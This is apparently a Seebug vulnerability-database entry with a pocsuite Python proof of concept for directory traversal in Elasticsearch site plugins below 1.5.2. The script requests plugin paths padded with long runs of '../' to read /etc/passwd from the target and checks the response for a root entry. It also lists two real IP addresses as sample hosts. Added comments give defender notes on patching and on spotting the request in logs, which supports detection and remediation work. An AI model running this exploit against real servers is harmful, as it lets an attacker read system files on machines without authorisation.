ElasticSearch < 1.4.5 / < 1.5.2 - Path Traversal

2015-08-31T00:00:00
ID SSV:89268
Type seebug
Reporter Root
Modified 2015-08-31T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# -*- coding: UTF-8 -*-

import re

from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register


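class TestPOC(POCBase):
    """pocsuite check for directory traversal through Elasticsearch site plugins.

    For each plugin name in a fixed list, the check requests
    ``/_plugin/<name>/`` followed by a run of ``../`` segments ending in
    ``etc/passwd``. It reports the node as affected when the response body
    contains what looks like the ``root`` entry of a passwd file.

    Defender notes: the metadata below gives ``< 1.5.2`` as the affected
    range, so upgrading past it is the fix. In HTTP access logs or at a
    reverse proxy, the request is recognisable by ``../`` segments that follow
    ``/_plugin/<name>/``.
    """

    # Metadata attributes, presumably read by the pocsuite framework
    # (none of the methods in this class read them) -- TODO confirm.
    vulID = '89268'
    version = '1'
    # NOTE(review): vulDate/createDate look like Unix epoch seconds -- confirm.
    vulDate = '1431878400'
    createDate = '1442937600'
    references = ['http://www.sebug.net/vuldb/ssvid-89268']
    name = 'ElasticSearch < 1.5.2 由插件导致的目录遍历'
    appPowerLink = 'https://www.elastic.co'
    appName = 'ElasticSearch多个插件'
    appVersion = '< 1.5.2'
    vulType = 'Path Transversal'
    desc = 'ElasticSearch部分插件存在缺陷导致目录遍历'
    samples = ['']
    # Hosts the original author recorded as not vulnerable; no method in this
    # class reads this list.
    sample_not_vul = ['http://62.75.150.124:9200','http://62.75.216.144:9200']

    def _attack(self):
        """Run the same check as verify mode and return its Output."""
        return self._verify()

    def _verify(self, verify=True):
        """Probe each known plugin path and report the first one that leaks.

        Args:
            verify: Unused; kept so the signature stays as callers expect.

        Returns:
            The ``Output`` built by ``parse_attack``: success carrying the
            matching URL and plugin name, or failure when no plugin path
            returned passwd-like content.

        Any exception raised by ``req.get`` propagates to the caller, so one
        unreachable plugin path ends the whole check.
        """
        plugin_names = ['test', 'kopf', 'HQ', 'marvel', 'bigdesk', 'head']
        # 'root' followed by six ':'-separated fields. This is the response
        # signature the check treats as evidence that the file was served.
        passwd_entry = r'root(:([0-9a-zA-Z\/\*\-\s]+)){6}'
        result = {}
        for plugin in plugin_names:
            vul_url = '%s/_plugin/%s/../../../../../../../../../../../../../../../../etc/passwd' % (self.url, plugin)
            response = req.get(vul_url, timeout=10).content

            # Fixed: this was re.searcH, which raises AttributeError on the
            # first iteration, so the check could never return a result.
            # NOTE(review): the pattern is a text string; if .content is bytes
            # (Python 3) re.search raises TypeError -- confirm target runtime.
            if re.search(passwd_entry, response):
                result['VerifyInfo'] = {'URL': vul_url}
                result['FileInfo'] = {'Filename': 'plugin name:' + plugin}
                # The first matching plugin is enough to flag the node.
                break

        return self.parse_attack(result)

    def parse_attack(self, result):
        """Wrap ``result`` in an ``Output``: success if non-empty, else fail.

        Args:
            result: Dict built by ``_verify``; empty when nothing matched.

        Returns:
            The populated ``Output`` instance.
        """
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output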


# Pass the class to pocsuite's register(); presumably this is how the
# framework discovers the check -- confirm against pocsuite.utils.
register(TestPOC)